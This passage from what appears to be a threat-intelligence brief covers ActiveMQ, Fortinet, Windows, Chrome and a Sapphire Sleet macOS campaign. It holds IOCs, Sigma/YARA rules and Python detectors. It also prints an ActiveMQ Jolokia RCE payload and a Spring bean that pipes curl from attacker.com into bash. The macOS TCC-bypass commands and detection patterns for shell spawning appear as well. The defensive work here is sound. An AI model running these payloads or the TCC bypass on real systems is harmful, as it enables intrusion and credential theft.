  "mbean": "org.apache.activemq:brokerName=localhost,type=Broker",
  "operation": "addNetworkConnector(java.lang.String)",
  "arguments": [
    "static:(failover:(vm://localhost))?brokerConfig=xbean:http://attacker.com/rce.xml"
  ]
}

Malicious Spring bean (attacker-hosted rce.xml):

<bean id="pwn" class="java.lang.ProcessBuilder" init-method="start">
  <constructor-arg>
    <list>
      <value>bash</value><value>-c</value>
      <value>curl http://attacker.com/shell.sh|bash</value>
    </list>
  </constructor-arg>
</bean>

Unauthenticated chained path (versions 6.0.0–6.1.1): CVE-2024-32114 in these versions exposes the Jolokia API without authentication, making CVE-2026-34197 effectively unauthenticated RCE. Treat any deployment in versions 6.0.0–6.1.1 as P0 — isolate from network if same-day patching is not possible.

Default credential amplification: admin:admin is the default ActiveMQ credential and is widely left unchanged in production — practically reducing the authentication requirement to zero in a large proportion of real-world deployments.

CVE-2026-24858 — Fortinet FortiCloud SSO: Tenant Isolation Failure

Root cause:  CWE-288 — Authentication Bypass Using an Alternate Path
Affected:    FortiOS (all versions with FortiCloud SSO enabled prior to 7.4.11)
Fixed in:    FortiOS 7.4.11 and branch-specific patched versions per Fortinet PSIRT

Attack flow:

  1. Attacker registers a FortiCloud account (free, publicly available)

  2. Attacker registers any Fortinet device (including lab unit) to the account

  3. Attacker uses the SSO authentication path — tenant isolation logic fails to scope the auth context to the attacker's registered devices only

  4. Attacker authenticates to victim's FortiGate / FortiManager / FortiAnalyzer

  5. Attacker creates local admin accounts and modifies network security configurations — firewall rules, routing tables, VPN policies

Post-exploitation observed (Fortinet PSIRT):

  • Unauthorized local admin accounts created (survive firmware updates)

  • Configuration export (policies, routes, VPN settings)

  • Potential long-term persistence via rogue accounts

CVE-2026-21643 / CVE-2026-35616 — FortiClient EMS RCE

CVE-2026-21643 (CVSS 9.1): SQL injection in FortiClient EMS web interface. Unauthenticated attacker sends crafted HTTP request — SQL injection grants code/command execution as the EMS service account.

CVE-2026-35616: Improper access control flaw in FortiClient EMS. Bypasses authentication requirement for protected management functions, enabling unauthenticated code execution.

Strategic risk: FortiClient EMS manages endpoint security policies across the entire managed device fleet. A compromised EMS server gives an attacker the ability to modify security policies, whitelist processes, disable protection modules, and extract configuration for all managed endpoints — a security architecture bypass from a single initial access point.

Sapphire Sleet macOS — Payload Chain (Source: Microsoft T1-03)

Lure delivery: Compiled AppleScript .scpt file named Zoom SDK Update.scpt. Opened in macOS Script Editor (Apple-signed, trusted — Gatekeeper does not block execution). Thousands of blank lines and a fake Zoom documentation comment block precede the malicious logic.

Execution cascade:

User opens .scpt in Script Editor
    └─► softwareupdate (decoy Apple binary, visible in UI)
    └─► curl attacker C2 (mac-cur1 UA) fetch Stage 1 AppleScript
         └─► osascript "run script result" [no disk write; Stage 1 executes in memory]
              ├─► mac-cur1: deploy com.apple.cli + services binary
              ├─► mac-cur2: deploy systemupdate.app via mac-cur4
              ├─► mac-cur3: TCC bypass + data collection + 575-line exfil script
              ├─► mac-cur4: download systemupdate.app ZIP
              └─► mac-cur5: download softwareupdate.app (social engineering decoy)

TCC Bypass mechanism (mac-cur3):

# Step 1: Use Finder (FDA holder) to rename TCC directory
osascript -e 'tell app "Finder" to move folder "com.apple.TCC" \
  of (path to library folder from user domain) to trash'

# Step 2: Stage TCC.db for modification
cp ~/Library/Application\ Support/com.apple.TCC/TCC.db /tmp/.t.db

# Step 3: Grant osascript AppleEvents permission — no user prompt
sqlite3 /tmp/.t.db \
  "INSERT OR REPLACE INTO access VALUES \
  ('kTCCServiceAppleEvents','/usr/bin/osascript',1,2,3,1, \
  'com.apple.finder',NULL,NULL,'UNUSED',NULL,0,1337);"

# Step 4: Restore modified database
cp /tmp/.t.db ~/Library/Application\ Support/com.apple.TCC/TCC.db
rm

Exfiltration — Nine data categories staged as ZIP archives (port 8443):

Archive Pattern       Contents
tapp_*.zip            Telegram session data
ext_*.zip             Browser profiles, cookies, credentials (Chrome, Brave, Arc)
ldg_*.zip             Ledger hardware wallet data
exds_*.zip            Exodus wallet
hs_*.zip              SSH keys + shell history
nt_*.zip              Apple Notes database
Keychain              macOS Keychain database
Crypto extensions     Sui, Phantom, TronLink, Coinbase, OKX, Solflare, Rabby, Backpack, Bitwarden
System logs           Diagnostic and system logs

Stolen password exfiltrated separately via Telegram Bot API on port 443.

Persistence — LaunchDaemon: /Library/LaunchDaemons/com.google.webkit.service.plist
  Launches the icloudz backdoor at system boot, before user login, with elevated privileges; survives reboots.

Reflective loading — icloudz: Uses NSCreateObjectFileImageFromMemory API to load Mach-O payloads from C2 into memory. No file written to disk. Defeats file-based detection and forensic artifact recovery.

CVE-2026-33824 — Windows IKE RCE (CVSS 9.8)

Attack vector: Network, unauthenticated, no user interaction required
Mechanism: Crafted IKEv2 packets exploit a vulnerability in Windows IKE service extensions. Microsoft and ZDI describe potential wormability — a compromised host can propagate exploitation to adjacent IPSec-enabled Windows hosts automatically.
Firewall mitigation (pre-patch): Block inbound UDP 500 and UDP 4500 from untrusted external sources. Does not protect against internal spread in already-compromised environments.

CVE-2026-32201 — SharePoint Server Spoofing (Zero-Day, Actively Exploited)

Root cause: Improper input validation in SharePoint Server
CVSS: 6.5 | Network / No user interaction / Unauthorized attacker
Impact: Network-based spoofing enabling unauthorized viewing or modification of sensitive SharePoint-hosted content. Microsoft confirms "Exploitation Detected" but has not publicly disclosed the exploitation chain.

CVE-2026-3909 / CVE-2026-3910 — Chrome Skia / V8 (CVSS 8.8)

CVE-2026-3909 (Skia): Out-of-bounds write triggered via crafted HTML rendering. Leads to memory corruption and arbitrary code execution within the renderer process.

CVE-2026-3910 (V8): Memory corruption in JavaScript/WebAssembly engine. Arbitrary code execution within browser sandbox. Both require only that a user visits a malicious webpage — no download, no install, no extension required. Google confirmed active exploitation at patch release.

Sapphire Sleet — Full IOC Table

Source: Microsoft Threat Intelligence (T1-03) — Verdict: Malicious (High Confidence)

Domains — C2 Infrastructure

uw04webzoom[.]us      C2 payload delivery Stage 1–5 fetches
uw05webzoom[.]us      C2 payload delivery
uw03webzoom[.]us      C2 payload delivery
ur01webzoom[.]us      C2 payload delivery
uv01webzoom[.]us      C2 payload delivery
uv03webzoom[.]us      C2 payload delivery
uv04webzoom[.]us      C2 payload delivery
ux06webzoom[.]us      C2 payload delivery
check02id[.]com       com.google.chromes.updaters C2 (port 5202)

Pattern note: *.webzoom[.]us deliberately impersonates Zoom infrastructure naming. check02id[.]com is a separate registrar/naming cluster — possible infrastructure compartmentalization between primary and tertiary backdoors.

IP Addresses — C2 Infrastructure

188.227.196[.]252     C2 infrastructure
83.136.208[.]246      com.apple.cli C2 port 6783
83.136.209[.]22       C2 infrastructure
83.136.208[.]48       C2 infrastructure
83.136.210[.]180      C2 infrastructure
104.145.210[.]107     C2 infrastructure

Network note: 83.136.208.0/22 hosts multiple C2 IPs — consider /22 range block at perimeter pending further investigation.

File Hashes — SHA-256


Filesystem Artifacts — Infection Markers

~/.zoom.log
  Infection marker presence indicates prior compromise attempt

~/Library/Application Support/iCloud/icloudz
  icloudz backdoor binary (reflective loader)

~/Library/Google/com.google.chromes.updaters
  Tertiary backdoor binary (60s beacon loop, port 5202)

/Library/LaunchDaemons/com.google.webkit.service.plist
  Persistence LaunchDaemon launches icloudz at boot

~/Library/Application Support/Authorization/auth.db
  services backdoor installation marker

/tmp/lg4err
  Error log artifact from services binary installation

/private/tmp/SystemUpdate/
  Staging directory for exfiltration archives

/private/tmp/SoftwareUpdate/
  Staging directory for decoy app

Campaign Artifacts (Published by Microsoft — Reference Only)

Upload authorization token : fwyan48umt1vimwqcqvhdd9u72a7qysi
Machine identifier example : 82cf5d92-87b5-4144-9a4e-6b58b714d599
curl user-agents (stage IDs): mac-cur1, mac-cur2, mac-cur3,
                               mac-cur4, mac-cur5, audio, beacon

Fortinet / Microsoft / Chrome — IOC Status

Fortinet CVE-2026-24858 / CVE-2026-21643 / CVE-2026-35616: [INSUFFICIENT SOURCE DATA] — No IP addresses, domains, file hashes, or actor-linked infrastructure published in available sources. Exploitation confirmed via CISA KEV and Fortinet PSIRT; actor IOCs not publicly released.

Apache ActiveMQ CVE-2026-34197: [INSUFFICIENT SOURCE DATA] — CISA KEV confirms in-the-wild exploitation; no actor-attributed C2 infrastructure or file IOCs published at time of this report.

Chrome CVE-2026-3909 / CVE-2026-3910: [INSUFFICIENT SOURCE DATA] — Google and CISA confirm active exploitation; no campaign-specific IOCs published.

Sapphire Sleet macOS — Detection Engineering

Immediate priority: Deploy all rules below within 24 hours on macOS endpoints.

SIGMA Pseudocode — Rule 1: Suspicious osascript Spawning curl

title: Sapphire Sleet - osascript Spawning curl with Piped Execution
id: SS-MAC-001
status: experimental
description: >
  Detects osascript spawning curl and piping result back to osascript
  — core execution pattern of Sapphire Sleet macOS payload chain.
  Legitimate software does not chain curl output into osascript execution.
logsource:
  category: process_creation
  product: macos
detection:
  selection_parent:
    ParentProcessName|endswith: 'osascript'
  selection_child:
    ProcessName|endswith: 'curl'
  selection_args:
    CommandLine|contains|any:
      - 'run script result'
      - '| osascript'
      - 'do shell script'
  condition: (selection_parent and selection_child) or selection_args
falsepositives:
  - Legitimate automation scripts using osascript with curl (rare in enterprise)
level: high
tags

SIGMA Pseudocode — Rule 2: Sapphire Sleet Campaign User-Agents

title: Sapphire Sleet - Campaign Stage-Tracking curl User-Agents
id: SS-MAC-002
status: experimental
description: >
  Detects curl requests using Sapphire Sleet campaign user-agents
  mac-cur1 through mac-cur5, 'audio', and 'beacon'. These strings
  are stage-tracking identifiers embedded in the actor's payload chain.
  No legitimate software uses these user-agent strings.
logsource:
  category: network
  product: macos
detection:
  selection:
    CommandLine|contains|any:
      - '-A mac-cur1'
      - '-A mac-cur2'
      - '-A mac-cur3'
      - '-A mac-cur4'
      - '-A mac-cur5'
      - '-A audio'
      - '-A beacon'
  condition: selection
falsepositives:
  - None expected
level: critical
tags

SIGMA Pseudocode — Rule 3: Unsigned LaunchDaemon with Vendor-Impersonating Name

title: Sapphire Sleet - Suspicious LaunchDaemon Creation
id: SS-MAC-003
status: experimental
description: >
  Detects creation of LaunchDaemon plist files with com.google.* or
  com.apple.* naming pattern where the creating process is not signed
  by Apple Inc. or Google LLC. Sapphire Sleet installs persistence
  via com.google.webkit.service.plist masquerading as a Google service.
logsource:
  category: file_event
  product: macos
detection:
  selection:
    TargetFilename|startswith:
      - '/Library/LaunchDaemons/com.google.'
      - '/Library/LaunchDaemons/com.apple.'
    EventType: 'FileCreate'
  filter_legitimate:
    SignatureStatus: 'signed'
    SignerName|contains|any:
      - 'Apple Inc.'
      - 'Google LLC'
  condition: selection and not filter_legitimate
falsepositives:
  - Legitimate Google or Apple software installers (filtered by signature check)
level: critical
tags

SIGMA Pseudocode — Rule 4: TCC Database Modification

title: Sapphire Sleet - TCC.db Modification via sqlite3
id: SS-MAC-004
status: experimental
description: >
  Detects sqlite3 modifying the macOS TCC database — the core
  mechanism used by Sapphire Sleet to grant osascript AppleEvents
  permissions without user consent. Direct TCC.db modification
  by non-system processes is anomalous.
logsource:
  category: file_event
  product: macos
detection:
  selection_file:
    TargetFilename|endswith: '/com.apple.TCC/TCC.db'
    EventType|in:
      - 'FileModify'
      - 'FileCreate'
  selection_process:
    ProcessName|endswith: 'sqlite3'
  filter_system:
    ProcessPath|startswith:
      - '/System/Library/'
      - '/usr/libexec/'
  condition: (selection_file and selection_process) and not filter_system
falsepositives:
  - Rare legitimate system operations; validate against process lineage
level: critical
tags

SIGMA Pseudocode — Rule 5: dscl -authonly Credential Validation

title: Sapphire Sleet - Credential Validation via dscl authonly
id: SS-MAC-005
status: experimental
description: >
  Detects dscl invoked with -authonly flag from a non-system process.
  Sapphire Sleet uses this to validate stolen credentials before
  exfiltration via Telegram Bot API. Legitimate use is rare outside
  of system authentication frameworks.
logsource:
  category: process_creation
  product: macos
detection:
  selection:
    ProcessName|endswith: 'dscl'
    CommandLine|contains: '-authonly'
  filter_system:
    ParentProcessPath|startswith:
      - '/System/'
      - '/usr/sbin/'
  condition: selection and not filter_system
falsepositives:
  - Some enterprise MDM or identity tools (validate against known-good list)
level: high
tags
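Rules SS-MAC-001 through SS-MAC-005 above, carried into runnable Python as an added example (not the brief's or Microsoft's detection code) and run over constructed macOS process and file events; the event IDs, user name, hostnames and plist name in the samples are made up, and the field names follow the pseudocode.

```python
"""Rules SS-MAC-001 through SS-MAC-005 as Python predicates, evaluated over
constructed macOS telemetry. Added example, not the brief's or Microsoft's own
detection code; event field names mirror the Sigma pseudocode."""

CAMPAIGN_UA_ARGS = ("-A mac-cur1", "-A mac-cur2", "-A mac-cur3", "-A mac-cur4",
                    "-A mac-cur5", "-A audio", "-A beacon")


def ss_mac_001(e: dict) -> bool:
    """osascript -> curl, or the piped-execution strings anywhere in the command
    line. As written, the rule's condition lets selection_args fire on its own."""
    selection_parent = e.get("ParentProcessName", "").endswith("osascript")
    selection_child = e.get("ProcessName", "").endswith("curl")
    cmd = e.get("CommandLine", "")
    selection_args = any(s in cmd for s in ("run script result", "| osascript", "do shell script"))
    return (selection_parent and selection_child) or selection_args


def ss_mac_002(e: dict) -> bool:
    """Stage-tracking curl user-agents; no legitimate software uses them."""
    return any(ua in e.get("CommandLine", "") for ua in CAMPAIGN_UA_ARGS)


def ss_mac_003(e: dict) -> bool:
    """LaunchDaemon plist with a vendor-impersonating name that was not written
    by a process signed by Apple Inc. or Google LLC."""
    target = e.get("TargetFilename", "")
    selection = (e.get("EventType") == "FileCreate" and
                 target.startswith(("/Library/LaunchDaemons/com.google.",
                                    "/Library/LaunchDaemons/com.apple.")))
    filter_legitimate = (e.get("SignatureStatus") == "signed" and
                         any(s in e.get("SignerName", "") for s in ("Apple Inc.", "Google LLC")))
    return selection and not filter_legitimate


def ss_mac_004(e: dict) -> bool:
    """sqlite3 writing TCC.db from outside the system paths."""
    selection_file = (e.get("TargetFilename", "").endswith("/com.apple.TCC/TCC.db") and
                      e.get("EventType") in ("FileModify", "FileCreate"))
    selection_process = e.get("ProcessName", "").endswith("sqlite3")
    filter_system = e.get("ProcessPath", "").startswith(("/System/Library/", "/usr/libexec/"))
    return selection_file and selection_process and not filter_system


def ss_mac_005(e: dict) -> bool:
    """dscl -authonly launched by something other than a system parent."""
    selection = e.get("ProcessName", "").endswith("dscl") and "-authonly" in e.get("CommandLine", "")
    filter_system = e.get("ParentProcessPath", "").startswith(("/System/", "/usr/sbin/"))
    return selection and not filter_system


RULES = {"SS-MAC-001": ss_mac_001, "SS-MAC-002": ss_mac_002, "SS-MAC-003": ss_mac_003,
         "SS-MAC-004": ss_mac_004, "SS-MAC-005": ss_mac_005}


def evaluate(event: dict) -> list[str]:
    """IDs of every rule the event trips, in rule order."""
    return [rid for rid, fn in RULES.items() if fn(event)]


# Constructed telemetry: one event per rule plus three that must stay quiet.
SAMPLE_EVENTS = [
    {"id": "e1", "ParentProcessName": "osascript", "ProcessName": "curl",
     "CommandLine": "curl -A mac-cur1 http://c2.example.invalid/s1 | osascript"},
    {"id": "e2", "EventType": "FileCreate", "SignatureStatus": "unsigned", "SignerName": "",
     "TargetFilename": "/Library/LaunchDaemons/com.google.webkit.service.plist"},
    {"id": "e3", "EventType": "FileCreate", "SignatureStatus": "signed", "SignerName": "Google LLC",
     "TargetFilename": "/Library/LaunchDaemons/com.google.example.daemon.plist"},  # made-up name
    {"id": "e4", "EventType": "FileModify", "ProcessName": "sqlite3", "ProcessPath": "/usr/bin/sqlite3",
     "TargetFilename": "/Users/alice/Library/Application Support/com.apple.TCC/TCC.db"},
    {"id": "e5", "ProcessName": "dscl", "ParentProcessPath": "/bin/zsh",
     "CommandLine": "dscl . -authonly alice hunter2"},
    {"id": "e6", "ProcessName": "dscl", "ParentProcessPath": "/System/Library/CoreServices/loginwindow.app",
     "CommandLine": "dscl . -authonly alice hunter2"},
    {"id": "e7", "ParentProcessName": "zsh", "ProcessName": "curl",
     "CommandLine": "curl -fsSL https://example.com/install.sh -o install.sh"},
]


def run(events: list[dict]) -> dict[str, list[str]]:
    """Map event id -> fired rule IDs, omitting events that trip nothing."""
    return {e["id"]: fired for e in events if (fired := evaluate(e))}


if __name__ == "__main__":
    for eid, fired in run(SAMPLE_EVENTS).items():
        print(eid, "->", ", ".join(fired))
```

Events e3, e6 and e7 exercise the filter_legitimate, filter_system and plain-benign paths and should produce no output.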

YARA Pattern — Sapphire Sleet Campaign Artifact Detection

rule Sapphire_Sleet_macOS_Campaign_Artifacts {
  meta:
    description = "Detects Sapphire Sleet macOS campaign user-agents and C2 patterns"
    author      = "CTI Daily Brief 2026-04-17"
    source      = "Microsoft Threat Intelligence (T1-03)"
    date        = "2026-04-17"
    confidence  = "high"
    tlp         = "white"

  strings:
    $ua1 = "mac-cur1" ascii
    $ua2 = "mac-cur2" ascii
    $ua3 = "mac-cur3" ascii
    $ua4 = "mac-cur4" ascii
    $ua5 = "mac-cur5" ascii

    $c2a = "webzoom.us" ascii nocase
    $c2b = "check02id.com" ascii nocase

    $token = "fwyan48umt1vimwqcqvhdd9u72a7qysi" ascii

    $path1 = "com.google.webkit.service.plist" ascii
    $path2 = "com.google.chromes.updaters" ascii
    $path3 = "icloudz" ascii

    $tcc = "kTCCServiceAppleEvents" ascii
    $tcc2 = "NSCreateObjectFileImageFromMemory" ascii

  condition:
    2 of ($ua*) or
    any of ($c2*) or
    $token or
    2 of ($path*) or
    ($tcc and $tcc2)
}

SIEM Field Logic — Network Monitoring

ALERT: Sapphire Sleet C2 Communication
  IF dns.query.name MATCHES "*.webzoom.us" OR "check02id.com"
  Severity: CRITICAL | Tag: sapphire_sleet_c2

ALERT: Sapphire Sleet Exfiltration Port
  IF network.destination.port == 8443
  AND network.source.device.os == "macOS"
  AND network.destination.ip NOT IN [approved_saas_ranges]
  Severity: HIGH | Tag: suspicious_exfil_macos

ALERT: Telegram Bot API from macOS Endpoint
  IF http.request.uri CONTAINS "api.telegram.org/bot"
  AND network.source.device.os == "macOS"
  AND process.name NOT IN ["approved_telegram_clients"]
  Severity: HIGH | Tag: credential_exfil_telegram

ALERT: Suspicious Outbound Port 5202
  IF network.destination.port == 5202
  AND network.source.device.type == "workstation"
  Severity: HIGH | Tag: sapphire_sleet_tertiary_c2

Apache ActiveMQ CVE-2026-34197 — Detection Engineering

SIGMA Pseudocode — Rule 6: Jolokia Exploitation Attempt

title: CVE-2026-34197 - ActiveMQ Jolokia RCE Attempt
id: AMQ-001
status: experimental
description: >
  Detects POST requests to Apache ActiveMQ Jolokia JMX-HTTP bridge
  containing known exploitation methods for CVE-2026-34197.
  addNetworkConnector and addConnector with brokerConfig parameter
  are the primary exploitation vectors. No legitimate Jolokia usage
  should contain remote URI references in brokerConfig.
logsource:
  category: webserver
  product: activemq
detection:
  selection_method:
    http.request.method: 'POST'
    http.request.uri|contains: '/api/jolokia/'
  selection_payload:
    http.request.body|contains|any:
      - 'addNetworkConnector'
      - 'addConnector'
  selection_config:
    http.request.body|contains: 'brokerConfig'
  selection_remote:
    http.request.body|contains|any:
      - 'http://'
      - 'https://'
      - 'xbean:'
  condition: selection_method and selection_payload and
             (selection_config or selection_remote)
falsepositives:
  - Legitimate broker network configuration changes via Jolokia (extremely rare)
level: critical
tags
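Rule AMQ-001 and the affected-version ranges from the CVE-2026-34197 section above, carried into runnable Python as an added example (not Apache's, Horizon3.ai's or the brief's own code); the request records, their source IPs and the c2.example.invalid hostname are constructed.

```python
"""CVE-2026-34197 triage helpers: an executable form of Rule AMQ-001 plus the
affected-version ranges stated in the brief. Added example, not Apache's or the
brief's own code; request records and versions below are constructed."""
import json

VULN_OPS = ("addNetworkConnector", "addConnector")
REMOTE_MARKERS = ("http://", "https://", "xbean:")


def triage_version(version: str) -> str:
    """Classify an ActiveMQ version against the ranges stated for CVE-2026-34197.

    Returns 'patched', 'vulnerable', or 'vulnerable-unauthenticated' (the
    6.0.0-6.1.1 chain with CVE-2024-32114, which the brief treats as P0).
    """
    parts = [int(p) for p in version.split(".")[:3]]
    v = tuple(parts + [0] * (3 - len(parts)))      # pad "6.1" to (6, 1, 0)
    if v < (5, 19, 4):
        return "vulnerable"
    if (6, 0, 0) <= v <= (6, 1, 1):
        return "vulnerable-unauthenticated"
    if (6, 0, 0) <= v < (6, 2, 3):
        return "vulnerable"
    return "patched"


def matches_amq_001(req: dict) -> bool:
    """Rule AMQ-001 condition: POST to /api/jolokia/ naming addConnector or
    addNetworkConnector, with brokerConfig or a remote/xbean reference in the body."""
    body = req.get("body", "")
    selection_method = req.get("method") == "POST" and "/api/jolokia/" in req.get("uri", "")
    selection_payload = any(op in body for op in VULN_OPS)
    selection_config = "brokerConfig" in body
    selection_remote = any(m in body for m in REMOTE_MARKERS)
    return selection_method and selection_payload and (selection_config or selection_remote)


def triage_request(req: dict) -> dict:
    """Pull the analyst-relevant fields out of a Jolokia JSON body for the alert.
    Non-JSON bodies still get a verdict; mbean/operation/argument stay None."""
    verdict = {"src": req.get("src_ip"), "alert": matches_amq_001(req),
               "mbean": None, "operation": None, "argument": None}
    try:
        payload = json.loads(req.get("body", "") or "{}")
    except json.JSONDecodeError:
        return verdict
    if isinstance(payload, dict):
        verdict["mbean"] = payload.get("mbean")
        verdict["operation"] = payload.get("operation")
        args = payload.get("arguments") or []
        verdict["argument"] = args[0] if args else None
    return verdict


# Constructed sample requests: one mirroring the exploit structure above (with a
# reserved .invalid hostname), one legitimate attribute read, one version probe.
SAMPLE_REQUESTS = [
    {"src_ip": "203.0.113.5", "method": "POST", "uri": "/api/jolokia/",
     "body": json.dumps({"type": "exec",
                         "mbean": "org.apache.activemq:brokerName=localhost,type=Broker",
                         "operation": "addNetworkConnector(java.lang.String)",
                         "arguments": ["static:(failover:(vm://localhost))"
                                       "?brokerConfig=xbean:http://c2.example.invalid/x.xml"]})},
    {"src_ip": "10.0.0.8", "method": "POST", "uri": "/api/jolokia/",
     "body": json.dumps({"type": "read",
                         "mbean": "org.apache.activemq:brokerName=localhost,type=Broker",
                         "attribute": "TotalEnqueueCount"})},
    {"src_ip": "10.0.0.9", "method": "GET", "uri": "/api/jolokia/version", "body": ""},
]


def scan(requests: list[dict]) -> list[dict]:
    """Return the triage record for every request that trips AMQ-001."""
    return [t for t in (triage_request(r) for r in requests) if t["alert"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(f"ALERT AMQ-001 src={hit['src']} op={hit['operation']} arg={hit['argument']}")
    for ver in ("5.18.3", "5.19.4", "6.1.1", "6.2.2", "6.2.3"):
        print(ver, triage_version(ver))
```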

SIEM Field Logic — ActiveMQ Network Monitoring

ALERT: Unauthorized Jolokia Access
  IF http.request.uri CONTAINS "/api/jolokia/"
  AND network.source.ip NOT IN [approved_management_subnets]
  AND network.destination.port IN [8161, 8162]
  Severity: HIGH

ALERT: ActiveMQ Process Spawning Shell
  IF process.parent.name IN ["activemq", "java"]
  AND process.name IN ["bash", "sh", "cmd.exe", "powershell.exe"]
  Severity: CRITICAL | Tag: activemq_rce_confirmed
  (This indicates successful exploitation; treat as an active incident)

ALERT: ActiveMQ Outbound to External Host
  IF process.parent.name IN ["activemq", "java"]
  AND network.destination.ip NOT IN [approved_activemq_peers]
  AND network.direction == "outbound"
  Severity: HIGH | Tag: possible_activemq_c2_callback

YARA Pattern — ActiveMQ Jolokia Exploitation Log Scan

rule ActiveMQ_Jolokia_CVE_2026_34197 {
  meta:
    description = "Detects CVE-2026-34197 exploitation attempts in ActiveMQ logs"
    cve         = "CVE-2026-34197"
    cvss        = "8.8"
    date        = "2026-04-17"
    confidence  = "high"

  strings:
    $jolokia    = "/api/jolokia/" ascii
    $add_net    = "addNetworkConnector" ascii
    $add_con    = "addConnector" ascii
    $broker_cfg = "brokerConfig" ascii
    $xbean      = "xbean:" ascii
    $spring_ctx = "ResourceXmlApplicationContext" ascii
    $runtime    = "Runtime.exec" ascii

  condition:
    ($jolokia and ($add_net or $add_con)) or
    ($jolokia and $broker_cfg) or
    $spring_ctx or
    $xbean
}

Fortinet FortiCloud SSO — Detection Engineering

SIEM Pseudocode — Rule 7: Anomalous SSO Admin Account Creation

ALERT: New Fortinet Admin Account via SSO from Rare Source
  IF event.source IN ["fortios_auth", "fortimanager_audit"]
  AND event.action == "admin_account_created"
  AND event.auth_method == "FortiCloud_SSO"
  AND source.ip NOT IN [known_admin_source_ips]
  WITHIN 300 seconds of a FortiCloud SSO login event
  Severity: CRITICAL
  Tag: fortinet_rogue_admin_creation
  Note: Treat as presumed CVE-2026-24858 exploitation pending investigation

ALERT: FortiCloud SSO Login from New ASN
  IF event.source IN ["fortios_auth", "fortimanager_audit"]
  AND event.action == "sso_login_success"
  AND source.asn NOT IN [historically_seen_admin_asns]
  Severity: HIGH
  Tag: fortinet_sso_rare_asn

Threat hunting hypothesis — retroactive (January–April 2026): Query Fortinet admin event logs from 2026-01-15 onward for:

  1. Admin accounts created via FortiCloud SSO sessions

  2. Configuration changes (firewall rules, routing, VPN) made within 60 minutes of an SSO login from a previously unseen source IP

  3. Any admin account created that does not correspond to a known team member in your IAM system

Windows IKE / TCP/IP — Detection Engineering

SIEM Pseudocode — Rule 8: IKE Traffic Anomaly

ALERT: High-Volume IKE Negotiation from Single Source
  IF network.protocol IN ["IKE", "IKEv2"]
  AND network.destination.port IN [500, 4500]
  AND COUNT(network.source.ip) > 50 per 60 seconds
  Severity: HIGH
  Tag: possible_cve_2026_33824_probe

ALERT: Windows IKE Service Crash
  IF windows.event.id == 7034
  AND windows.service.name CONTAINS "ikeext"
  Severity: HIGH
  Tag: ike_service_instability_post_external_traffic

Chrome CVE-2026-3909 / CVE-2026-3910 — Detection Engineering

EDR Pseudocode — Rule 9: Suspicious Chrome Child Process

ALERT: Suspicious Shell Spawned from Chrome
  IF process.parent.name IN ["chrome.exe", "chromium.exe", "brave.exe"]
  AND process.name IN ["cmd.exe", "powershell.exe", "wscript.exe",
                       "cscript.exe", "mshta.exe", "bash", "sh"]
  AND time_since_parent_crash < 30 seconds
  Severity: CRITICAL
  Tag: possible_chrome_rce_exploitation

ALERT: Chrome Process Memory Anomaly
  IF process.name IN ["chrome.exe", "chromium.exe"]
  AND process.memory_anomaly == true
  AND process.spawned_child == true
  Severity: HIGH
  Tag: browser_sandbox_escape_indicator

MITRE ATT&CK — Technique Mapping:

ID          Technique                   Sub-Technique               Cluster                       Source Basis
T1566       Phishing                    Via Service (LinkedIn)      Sapphire Sleet                Microsoft T1-03 (source-confirmed)
T1204.002   User Execution              Malicious File (.scpt)      Sapphire Sleet                Microsoft T1-03 (source-confirmed)
T1059.002   Command & Scripting         AppleScript                 Sapphire Sleet                Microsoft T1-03 (source-confirmed)
T1562.001   Impair Defenses             TCC Database Modification   Sapphire Sleet                Microsoft T1-03 (source-confirmed)
T1055       Process Injection           Reflective Mach-O Loading   Sapphire Sleet                Microsoft T1-03 (source-confirmed)
T1056.002   Input Capture               GUI Input Capture           Sapphire Sleet                Microsoft T1-03 (source-confirmed)
T1555.001   Credential Stores           Keychain                    Sapphire Sleet                Microsoft T1-03 (source-confirmed)
T1539       Steal Web Session Cookie    -                           Sapphire Sleet                Microsoft T1-03 (source-confirmed)
T1547.011   Autostart Execution         Plist Modification          Sapphire Sleet                Microsoft T1-03 (source-confirmed)
T1041       Exfiltration Over C2        -                           Sapphire Sleet                Microsoft T1-03 (source-confirmed)
T1190       Exploit Public-Facing App   -                           ActiveMQ CVE-2026-34197       CISA KEV + THN (behavior-inferred; stated basis: Jolokia API exploitation)
T1078       Valid Accounts              -                           Fortinet CVE-2026-24858       Fortinet PSIRT / The Record (behavior-inferred; stated basis: rogue admin account creation via SSO)
T1059.003   Command & Scripting         Windows Command Shell       Fortinet EMS CVE-2026-21643   CISA KEV (behavior-inferred from SQL injection → command execution)

MITRE D3FEND — Recommended Countermeasures:

D3FEND ID   Countermeasure               Applies To
D3-EAL      Executable Allowlisting      Block unsigned/internet-sourced Mach-O + .scpt on macOS
D3-NTF      Network Traffic Filtering    Block *.webzoom.us, check02id.com, known C2 IP ranges
D3-UAP      User Account Permissions     Restrict Jolokia API; enforce non-default ActiveMQ credentials
D3-SYSM     System Call Analysis         Alert on NSCreateObjectFileImageFromMemory from non-Apple processes
D3-CE       Credential Hardening         Replace admin:admin on all ActiveMQ deployments; audit Fortinet admin accounts
D3-ORA      Operating System API         Monitor sqlite3 access to TCC.db from non-system processes

Chapter 05 - Governance, Risk & Compliance

Regulatory Exposure by Cluster

Fortinet FortiCloud SSO / EMS (CVE-2026-24858, CVE-2026-21643, CVE-2026-35616)

  • GDPR / EU NIS2: If a FortiCloud SSO compromise resulted in unauthorized access to systems processing EU personal data, organizations face potential breach-notification obligations under Article 33 GDPR (72-hour notification window from awareness) and NIS2 incident reporting requirements. MSPs and MSSPs face heightened NIS2 exposure given supply chain obligations.

  • India DPDP Act: Organizations processing personal data of Indian residents on networks protected by compromised Fortinet infrastructure must assess whether data confidentiality was affected — notification obligations apply.

  • US FCEB / BOD 22-01: CVE-2026-21643 FCEB deadline passed April 16, 2026. Non-compliant federal agencies and contractors are in documented breach of BOD 22-01. Document remediation status and escalate to CISO and counsel.

  • HIPAA / PCI-DSS: Compromise of firewall management platforms protecting ePHI or cardholder data environments triggers breach investigation obligations and potential mandatory reporting to HHS or card brands.

Microsoft Patch Tuesday (CVE-2026-32201, CVE-2026-33824, CVE-2023-21529)

  • SOX / SEC Cyber Disclosure Rule: US-listed companies that experience material impacts from these exploited vulnerabilities may need to evaluate disclosure obligations under SEC's cybersecurity incident reporting rule. The Exchange/Medusa ransomware link (Storm-1175) is particularly relevant given ransomware's materiality precedents.

  • GDPR / NIS2: Exploitation of SharePoint spoofing flaw in environments hosting personal data may constitute a personal data breach requiring notification.

